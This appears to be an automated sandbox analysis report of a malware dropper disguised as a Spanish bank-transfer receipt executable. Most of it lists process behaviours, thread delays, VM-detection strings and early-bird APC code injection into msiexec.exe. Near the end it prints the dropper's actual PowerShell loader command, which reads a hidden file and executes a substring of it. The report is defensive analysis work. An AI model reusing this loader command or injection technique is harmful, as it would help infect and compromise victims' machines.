Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597290	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596854	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595186	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594464	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6323			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3381			Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6500	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6040	Thread sleep count: 8905 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6040	Thread sleep count: 949 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597290s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596854s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595186s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -594733s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2368	Thread sleep time: -594464s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597290	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596854	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595186	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594464	Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1315720582.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1315720582.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000001.00000002.1315720582.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: svchost.exe, 00000004.00000002.2190327454.0000025475658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2190551955.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2190551955.000000000569C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000004.00000002.2188694080.000002547002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	API call chain: ExitProcess graph end node			graph_0-3317
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	API call chain: ExitProcess graph end node			graph_0-3474

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_04ACF568 LdrInitializeThunk,LdrInitializeThunk,

1_2_04ACF568

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 40E0000

Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
